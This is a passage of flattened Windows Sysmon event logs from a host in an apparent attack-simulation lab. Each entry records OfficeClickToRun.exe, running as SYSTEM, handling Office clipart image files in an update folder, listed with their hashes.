Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0300862.WMFMD5=614D29D89A22AADB1F40D68889874D12,SHA256=29049B80EE929DB26F0427E452CA655AF411185B268583D6E6EA477F6398B846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297759.WMFMD5=AD9A79133F85AAAC5EF32C11C263AF91,SHA256=E12C120EE64970078F00BB2116CFFB99D112CE5587265A7E3C92AB00F94417BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297757.WMFMD5=F44AA727ECBC0009423B1D67603008D3,SHA256=5C519B5337B31CB296ECAEDB11363043349402913BBE3C9E7F0BE132913C29BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297727.WMFMD5=AD318BA7F85BEA84D80CE25EBD92E22C,SHA256=79F55D77636698D8B7CD6314B3D3E7A06FE33FD855650B0D409DF81D5AB75643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297725.WMFMD5=53B3FAF674735F9BE8F37BDA30B5DF61,SHA256=AC0D178FAB82C7191C62200509B829D189357A346B6193A751441A939BED9BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297269.WMFMD5=904B9493A7B13E7E5C4F001C08B64E86,SHA256=48FF565C5780F1A6460662108EF2F077F47E7BE2CE81D264F87986075530839D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0297229.WMFMD5=BD12B921F14F4955042659BCA75BE007,SHA256=F7CDB147318C995A8813C614436FE4C7E6EDC77EB56879BFBE02CE2440FCACDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0296288.WMFMD5=84EDECEF87C64036CE5B3C5F07379444,SHA256=B15B0EB3C80146A4CF33C4FE9D9221960647228C9BC1C26804D4A6479C3EB5AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0296279.WMFMD5=F5116706EDF9DF2373EAC555383251BD,SHA256=4A7593C562C410E88185EAD8013F3E4F924AF8EB15F292E2B49E339B0C93D9E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0296277.WMFMD5=CB92503F6F4E9DFE2236153E84AA6B21,SHA256=BA77CA6C081696A26230A991B3B3F71B719DEC27374351BC3E451D46323E9FBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0295069.WMFMD5=B174D01F37D5300FBD2310D8D5C7F676,SHA256=1B8C10C7B1F3645A95F936B0D408638C0727ADD59C939BACE918FF0C98665EAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0294991.WMFMD5=FF3D58B77A63C9B0851DDE0E11AD499E,SHA256=92710853B9903981D98A511F2AEEB2B6D53D5E46B54CCC0C0E03B55EE5C35FD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0294989.WMFMD5=F459A2B624108D2C5B5084D9AE3E32C3,SHA256=A156F88DE462917902A782A4ED439DA8C07F814A2610208D9F8A39A0F868857A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0293832.WMFMD5=326BC3EC6B7F5F1877D47DFE4E96C083,SHA256=D281C60E3B8241A9418C98C81AF92B527F2C670F0F17B2C2C087A2804595CA36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0293800.WMFMD5=A2A108B81B12AFAA51D935F6ADCFFAED,SHA256=164D6EEF32B6E0E6E44F60940BEB44176C446E50C767DB2E9DDAC5C2EBC65C23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0292286.WMFMD5=36B02EA27DBDA1519CBBF33201FD16C8,SHA256=F98D14419FEF1DE31345FBE40AE540A58F5AC9768948CBE722839B91B280B9C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0292278.WMFMD5=1156C4CEE39B95EBB9246BEC8538E85D,SHA256=61EEFF2AFAD2009280F25AC4A84E118208AA17DBDA9EC035A4834FD2B31D79F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0292272.WMFMD5=9B29F1D8F645B33990AA2D0FF6EFD62E,SHA256=91987254055270C744C6AB79DA2647ABF7A30692C9E4DAD4039FCA032EBAC064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0292270.WMFMD5=7E4B691F1BC63A51AAAECF4EE256C299,SHA256=8B3D3F78D6A43B0F3ADB7B36D2574D563CA04B8152BA608634B6E80EC5F28FCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0292248.WMFMD5=7294EA4870034910A514F70747A6CB99,SHA256=F0DD06BDE5C6F2DE7A5D40D79D070C4C18028DE639CE6A31A3DBB85EE73F827C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0291794.WMFMD5=373B7031889376B3A7CC226549DC029B,SHA256=46CEDED3A7715CA11A4A548B868A99E3D11BA8E4C1FD0A7F640719DD12B7217A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0290548.WMFMD5=7885B5AFB7CD344BE94F49E8A0EC6138,SHA256=6B350D6C80C6A7A8BAC21467703619EC153435038EA69F6ED0DF51C360E3B732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0289430.JPGMD5=3E66E925715A36C3310D9993CD2736F6,SHA256=BBFBD18A9766EEB13928AD9D5129C92C082CB9345E513F8569706E095BA22DFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287645.JPGMD5=B48408139CC266EE489AE7C1CDD5EC2C,SHA256=B4B0F80FDD50FE2B47A786E81A6EF319F2069FABCB61BDE4C36A384AFBC2AB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287644.JPGMD5=1FEDC8FE91E28370841EBEB57D993E1C,SHA256=5511022213DBBCFEFD30C9D0DCF66F70CD7D2217E00F6F8FAAE43679958DDF7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287643.JPGMD5=86176967EAEEA8ED8CFC3175C0E76E81,SHA256=EFC2FD83267A63AA0A5A04B3AFD4F5E7D1A0954CBAEF9F64998C3C11AE88DC3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287642.JPGMD5=0133AEBCED2135AAC48DADED9324217C,SHA256=98AD2683B01911F97810FC537ED336E35A5DF8956EB8DF9D3AB62C35BB90F7D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287641.JPGMD5=9A8083D798DF200EE923B82C642D6A74,SHA256=1F6715855315501CA125A2895E24B704177A63286E6C8215A5892E952AABAA92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287417.WMFMD5=E62A1CF77EF951CD0956D1338AFC2A38,SHA256=556B468F7DC14BA895BC065B35DD75411C41FC423806C13D81D15BC84FB4216F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287415.WMFMD5=6B214D6AFF15F1BB96015527772B5410,SHA256=8796A13939128EB5B9F5F510752287088A39451021BFF258785DF5ED99A9AC89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287408.WMFMD5=F884B0B077E02287EFF7582943291DA1,SHA256=52E12195F40B0A6C61B71F5A28799ED6461B14753BCA89D7780D3C0AC0A505AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287024.WMFMD5=EB94A7C9607B46330FEDF1A0AA45AAC1,SHA256=EA68FCECCAC2DAD9A7DFD7DA4569E0F2C8251C3C8E1878FFC9CA644CECDA1479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287020.WMFMD5=46215C4A880FDDEA0A1ED73A24DA0722,SHA256=D96EADB26101F7AF19096A281F12E0D7DF11A3D2AC1A5B18E9956DA27B0233A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287019.WMFMD5=4F074FA92172C317F7AE3436DA24A9E4,SHA256=3057885E30DF2098E775D39776BB06C30922CD65D0DBF2E7A088E3A0AEC6A445,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0287018.WMFMD5=C067373A5CEE63005E7F08F49E38A02B,SHA256=134677B767F651FB1CA95855CD5131837C74AF92F34ABA68E4034E03525796B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285822.WMFMD5=E899EB175EE554C5926A56E0157CC4EE,SHA256=8051B515B31C5E2A408B7FD673700E74F62691054042BC961834AE950CD147D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285820.WMFMD5=9D98E83655C53B138739B7DF49012DF9,SHA256=B3178652979D94B21EC1B4BEECC31D8A74BD822F8A4E47ABBFAE0EA5E230D9F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285808.WMFMD5=B06B496ADC2680E16ECF86F765302078,SHA256=1BBFE8ACDD1C364ACCC04C1155227A9DFEF6AFAEB167A7BB87D2F2561A0F937E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285796.WMFMD5=1678FBE051FC1BCC75B4E63C66E9C905,SHA256=04ABADE35D078D2D21BE3133ED51149C22A4AE8DCFF91AFAFDF468176DFE2F34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285792.WMFMD5=1D23E4E71779D0583DA48B52204BF860,SHA256=B6A0F248C603CDB7DC7B4B58A17174792E3ED7A879D451995A6CB4D4BFB7B296,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285782.WMFMD5=8CF57A004B1A2913567090CBFD07BE73,SHA256=E29ABA1BB82539A0281729EC759A5D64A28D8786CDD87AD2B2958EAAB1F963CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285780.WMFMD5=342D53D83E375472A78BC671B15B1F69,SHA256=D505390670FE38BA0CE8F744EC0EDC1C1164238CE8686CEEA2955AA82A3D0A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285484.WMFMD5=A8C5249ADBA66E84B33BF099C0E897F4,SHA256=7F1924B6225DAB148F4477B6A7425D0ED79F1ADEF1D51A11285C259C00DF372C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0285462.WMFMD5=F5EEEE8F7CC76FB207DC50A9A72C6B32,SHA256=FDFA214B10F3F3C15ED8BCF62FD05AA4CDD5B9B17224B7C612AD754101E6B875,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0282932.WMFMD5=3E2E6F7FA7BFFE3B056C5A3DF7F09035,SHA256=F6A60D117D421E97D1C34998C75DA61F3FADF5B4B128EA69BBCA49E233386D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 